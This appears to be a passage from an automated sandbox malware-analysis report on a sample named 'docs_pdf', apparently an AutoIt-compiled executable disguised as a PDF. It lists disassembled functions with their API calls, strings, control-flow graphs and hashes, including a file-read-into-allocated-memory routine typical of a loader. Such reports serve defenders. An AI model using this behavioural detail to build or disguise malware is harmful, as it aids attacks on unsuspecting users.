                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID: P
                                                            • API String ID: 1438897964-1343716551
                                                            • Opcode ID: 3b3959f62cf5ab2e214fee59de35c9be437de411c31f11ebe15afcd2a3665a5b
                                                            • Instruction ID: 1cc23d418b5f8663b3a7c58eab4301466e4b7ba93d6e30a8c5512995777cbd40
                                                            • Opcode Fuzzy Hash: 3b3959f62cf5ab2e214fee59de35c9be437de411c31f11ebe15afcd2a3665a5b
                                                            • Instruction Fuzzy Hash: 4611CD719183059FC300DF28DC0596BFBF8EBA4710F00461EF554836B2DBB48A95CB92
                                                            Function 00154696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0012E7C1), ref: 001546A6
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 001546B7
                                                            • FindClose.KERNEL32(00000000), ref: 001546C7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: cb0cbbb6f01dc6bc12f5fd4878b15753444106cfb8b5b153580892a1defda98e
                                                            • Instruction ID: f520152a15a241bd81d13b5dfba701d47cffe3d1d0904f9433727835edefad2a
                                                            • Opcode Fuzzy Hash: cb0cbbb6f01dc6bc12f5fd4878b15753444106cfb8b5b153580892a1defda98e
                                                            • Instruction Fuzzy Hash: 09E020318144009B42106738EC4D4EB776CDF0633AF100719FC79C24E0E7B09DD486D9
                                                            Function 000FE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 0013428C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: b93daa6ba7608337c2f8e1cb226867012ac750931996b3bc0108f8caad6a7dcf
                                                            • Instruction ID: 30319eb73bdca5cf6ef6e2bb7318594802a3b2eab0e7719bfc0653ec431feed9
                                                            • Opcode Fuzzy Hash: b93daa6ba7608337c2f8e1cb226867012ac750931996b3bc0108f8caad6a7dcf
                                                            • Instruction Fuzzy Hash: 0DA28D74A04249CFCB24CF58C480ABEB7F1FF58300F648169EA16AB761D775AD82DB91
                                                            Function 00100B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00100BBB
                                                            • timeGetTime.WINMM ref: 00100E76
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00100FB3
                                                            • TranslateMessage.USER32(?), ref: 00100FC7
                                                            • DispatchMessageW.USER32(?), ref: 00100FD5
                                                            • Sleep.KERNEL32(0000000A), ref: 00100FDF
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 0010105A
                                                            • DestroyWindow.USER32 ref: 00101066
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00101080
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 001352AD
                                                            • TranslateMessage.USER32(?), ref: 0013608A
                                                            • DispatchMessageW.USER32(?), ref: 00136098
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001360AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                            • API String ID: 4003667617-3242690629
                                                            • Opcode ID: 147372955c89bd9917bc7c541f58128233e2e24cfd02c8357782dbf203722f1e
                                                            • Instruction ID: e99b79b897cd0cda2c0f721e031959ad964195106342ca36965ab801cf52ec32
                                                            • Opcode Fuzzy Hash: 147372955c89bd9917bc7c541f58128233e2e24cfd02c8357782dbf203722f1e
                                                            • Instruction Fuzzy Hash: A5B2E470608741DFD729DF24C884BAAB7E6FF84704F14491DF58A972A1DBB0E885DB82
                                                            Function 001593DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001591E9: __time64.LIBCMT ref: 001591F3
                                                              • Part of subcall function 000F5045: _fseek.LIBCMT ref: 000F505D
                                                            • __wsplitpath.LIBCMT ref: 001594BE
                                                              • Part of subcall function 0011432E: __wsplitpath_helper.LIBCMT ref: 0011436E
                                                            • _wcscpy.LIBCMT ref: 001594D1
                                                            • _wcscat.LIBCMT ref: 001594E4
                                                            • __wsplitpath.LIBCMT ref: 00159509
                                                            • _wcscat.LIBCMT ref: 0015951F
                                                            • _wcscat.LIBCMT ref: 00159532
                                                              • Part of subcall function 0015922F: _memmove.LIBCMT ref: 00159268
                                                              • Part of subcall function 0015922F: _memmove.LIBCMT ref: 00159277
                                                            • _wcscmp.LIBCMT ref: 00159479
                                                              • Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AAE
                                                              • Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AC1
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001596DC
                                                            • _wcsncpy.LIBCMT ref: 0015974F
                                                            • DeleteFileW.KERNEL32(?,?), ref: 00159785
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0015979B
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001597AC
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001597BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 2b4a225312abf6fe392f02b4965348945c2467499bf6867be5382f0a0fa24364
                                                            • Instruction ID: 7a8f0cb47b7e88c03bae9675e3f0377e25b7b0aa0f05d0960a3c14b8efe24a7d
                                                            • Opcode Fuzzy Hash: 2b4a225312abf6fe392f02b4965348945c2467499bf6867be5382f0a0fa24364
                                                            • Instruction Fuzzy Hash: 9AC13CB1D00219EACF15DF94CC85EDEB7BDAF58301F0040AAF619E7151EB309A898F65
                                                            Function 000F71EB Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 000F4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001B62F8,?,000F37C0,?), ref: 000F4882
                                                              • Part of subcall function 0011074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000F72C5), ref: 00110771
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000F7308
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0012ECF1
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0012ED32
                                                            • RegCloseKey.ADVAPI32(?), ref: 0012ED70
                                                            • _wcscat.LIBCMT ref: 0012EDC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$`Y
                                                            • API String ID: 2673923337-3526359297
                                                            • Opcode ID: a8ca55c9e3e0c3e4ca469abdf39ba7c68e42e4a4789a4d069df2429a11401790
                                                            • Instruction ID: df7e01d3db479f8a7a34342903b7efc433a34498cea0042936a7ac1cd8fb161f
                                                            • Opcode Fuzzy Hash: a8ca55c9e3e0c3e4ca469abdf39ba7c68e42e4a4789a4d069df2429a11401790
                                                            • Instruction Fuzzy Hash: 7271AF714083059EC714EF65EC819ABBBF8FF98340F44096EF549D36A1DB309989CB62
                                                            Function 000F3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 000F3074
                                                            • RegisterClassExW.USER32(00000030), ref: 000F309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
                                                            • LoadIconW.USER32(000000A9), ref: 000F30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 08480aeba827ecf58b77a83de888a69ac23437f256672012ec31b516ec26f17c
                                                            • Instruction ID: d1a85d5f8bd8acff609758279815deb4fcacdcc915c2930e564a047b5ac345ef
                                                            • Opcode Fuzzy Hash: 08480aeba827ecf58b77a83de888a69ac23437f256672012ec31b516ec26f17c
                                                            • Instruction Fuzzy Hash: 98313871844349EFDB41DFA4E885ADABBF0FB09310F14456EE584A66A0E3B905C6CF50
                                                            Function 000F3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 000F3074
                                                            • RegisterClassExW.USER32(00000030), ref: 000F309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
                                                            • LoadIconW.USER32(000000A9), ref: 000F30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: c9b13fc0542578c145f1bcafd29030c9790c5f8b0aa7e364d75aa92f5123d54c
                                                            • Instruction ID: e048c712e6264f417c55acdc077ceadd8a90d6f8602d65a882647f16162febf4
                                                            • Opcode Fuzzy Hash: c9b13fc0542578c145f1bcafd29030c9790c5f8b0aa7e364d75aa92f5123d54c
                                                            • Instruction Fuzzy Hash: A121C5B5940318AFDB00DFA4EC49B9EBBF5FB08710F00422AF514A66A0D7B545858F91
                                                            Function 000F3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 000F3A62
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 000F3A71
                                                            • LoadIconW.USER32(00000063), ref: 000F3A88
                                                            • LoadIconW.USER32(000000A4), ref: 000F3A9A
                                                            • LoadIconW.USER32(000000A2), ref: 000F3AAC
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000F3AD2
                                                            • RegisterClassExW.USER32(?), ref: 000F3B28
                                                              • Part of subcall function 000F3041: GetSysColorBrush.USER32(0000000F), ref: 000F3074
                                                              • Part of subcall function 000F3041: RegisterClassExW.USER32(00000030), ref: 000F309E
                                                              • Part of subcall function 000F3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
                                                              • Part of subcall function 000F3041: InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
                                                              • Part of subcall function 000F3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
                                                              • Part of subcall function 000F3041: LoadIconW.USER32(000000A9), ref: 000F30F2
                                                              • Part of subcall function 000F3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 1ee9b8c8dba168b824f25e00a4a332eab248ea92077e46cce384c8ae5e8aff5e
                                                            • Instruction ID: 97ab78c98729bc503b61e63993cbb750e7c6053416c45473b1dbced84699f093
                                                            • Opcode Fuzzy Hash: 1ee9b8c8dba168b824f25e00a4a332eab248ea92077e46cce384c8ae5e8aff5e
                                                            • Instruction Fuzzy Hash: F0215171D00308AFEB159FA4EC05BAE7BB4FB18711F004269F604A66A0D7BD5994DF44
                                                            Function 000F3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 767 f3633-f3681 769 f3683-f3686 767->769 770 f36e1-f36e3 767->770 772 f3688-f368f 769->772 773 f36e7 769->773 770->769 771 f36e5 770->771 774 f36ca-f36d2 DefWindowProcW 771->774 777 f375d-f3765 PostQuitMessage 772->777 778 f3695-f369a 772->778 775 f36ed-f36f0 773->775 776 12d31c-12d34a call 1011d0 call 1011f3 773->776 779 f36d8-f36de 774->779 781 f3715-f373c SetTimer RegisterWindowMessageW 775->781 782 f36f2-f36f3 775->782 814 12d34f-12d356 776->814 780 f3711-f3713 777->780 783 12d38f-12d3a3 call 152a16 778->783 784 f36a0-f36a2 778->784 780->779 781->780 788 f373e-f3749 CreatePopupMenu 781->788 786 f36f9-f370c KillTimer call f44cb call f3114 782->786 787 12d2bf-12d2c2 782->787 783->780 809 12d3a9 783->809 789 f36a8-f36ad 784->789 790 f3767-f3776 call f4531 784->790 786->780 794 12d2c4-12d2c6 787->794 795 12d2f8-12d317 MoveWindow 787->795 788->780 797 12d374-12d37b 789->797 798 f36b3-f36b8 789->798 790->780 803 12d2e7-12d2f3 SetFocus 794->803 804 12d2c8-12d2cb 794->804 795->780 797->774 806 12d381-12d38a call 14817e 797->806 807 f36be-f36c4 798->807 808 f374b-f375b call f45df 798->808 803->780 804->807 810 12d2d1-12d2e2 call 1011d0 804->810 806->774 807->774 807->814 808->780 809->774 810->780 814->774 815 12d35c-12d36f call f44cb call f43db 814->815 815->774
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 000F36D2
                                                            • KillTimer.USER32(?,00000001), ref: 000F36FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000F371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F372A
                                                            • CreatePopupMenu.USER32 ref: 000F373E
                                                            • PostQuitMessage.USER32(00000000), ref: 000F375F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: e9565af2075c4122f0b8ff1b2a7dc7d94144daf704bebe0714068186ace79263
                                                            • Instruction ID: 281244031b40f37ea52a82a9512bb47ae8cae25759197c911c19b2b3e8505bdd
                                                            • Opcode Fuzzy Hash: e9565af2075c4122f0b8ff1b2a7dc7d94144daf704bebe0714068186ace79263
                                                            • Instruction Fuzzy Hash: A641E9B110420DBBDB347B24EC49BBE37A5EB14351F140229FB02D6EE1DB689D91B661
                                                            Function 000F3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                            • API String ID: 1825951767-3513169116
                                                            • Opcode ID: 9497e56b95b5d4ec9f00d0421232955aa99904001d43b2edb5665fbcb9ed7650
                                                            • Instruction ID: b09abac425dd7916cd7a1811a607ae2a84bec8a4a7540748dd939bf4672b9ff9
                                                            • Opcode Fuzzy Hash: 9497e56b95b5d4ec9f00d0421232955aa99904001d43b2edb5665fbcb9ed7650
                                                            • Instruction Fuzzy Hash: 33A16B7281422DAADF04EFA0DC91AFEB778BF24310F040129F616B7592DF749A49DB60
                                                            Function 036E25C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 942 36e25c0-36e266e call 36e0000 945 36e2675-36e269b call 36e34d0 CreateFileW 942->945 948 36e269d 945->948 949 36e26a2-36e26b2 945->949 950 36e27ed-36e27f1 948->950 956 36e26b9-36e26d3 VirtualAlloc 949->956 957 36e26b4 949->957 951 36e2833-36e2836 950->951 952 36e27f3-36e27f7 950->952 958 36e2839-36e2840 951->958 954 36e27f9-36e27fc 952->954 955 36e2803-36e2807 952->955 954->955 959 36e2809-36e2813 955->959 960 36e2817-36e281b 955->960 961 36e26da-36e26f1 ReadFile 956->961 962 36e26d5 956->962 957->950 963 36e2895-36e28aa 958->963 964 36e2842-36e284d 958->964 959->960 967 36e281d-36e2827 960->967 968 36e282b 960->968 969 36e26f8-36e2738 VirtualAlloc 961->969 970 36e26f3 961->970 962->950 965 36e28ac-36e28b7 VirtualFree 963->965 966 36e28ba-36e28c2 963->966 971 36e284f 964->971 972 36e2851-36e285d 964->972 965->966 967->968 968->951 975 36e273f-36e275a call 36e3720 969->975 976 36e273a 969->976 970->950 971->963 973 36e285f-36e286f 972->973 974 36e2871-36e287d 972->974 978 36e2893 973->978 979 36e287f-36e2888 974->979 980 36e288a-36e2890 974->980 982 36e2765-36e276f 975->982 976->950 978->958 979->978 980->978 983 36e27a2-36e27b6 call 36e3530 982->983 984 36e2771-36e27a0 call 36e3720 982->984 990 36e27ba-36e27be 983->990 991 36e27b8 983->991 984->982 992 36e27ca-36e27ce 990->992 993 36e27c0-36e27c4 FindCloseChangeNotification 990->993 991->950 994 36e27de-36e27e7 992->994 995 36e27d0-36e27db VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036E2691
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036E28B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                            • Instruction ID: 59ec276cb396726c7d68331dd568568ebc7d6ec36b514f7ffe10157d4c809784
                                                            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                            • Instruction Fuzzy Hash: 54A12A74E01208EBDF14DFA4C998BEEB7BABF48304F248599E501BB280D7759A49CF54
                                                            Function 000F39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1073 f39e7-f3a57 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000F3A15
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000F3A36
                                                            • ShowWindow.USER32(00000000,?,?), ref: 000F3A4A
                                                            • ShowWindow.USER32(00000000,?,?), ref: 000F3A53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
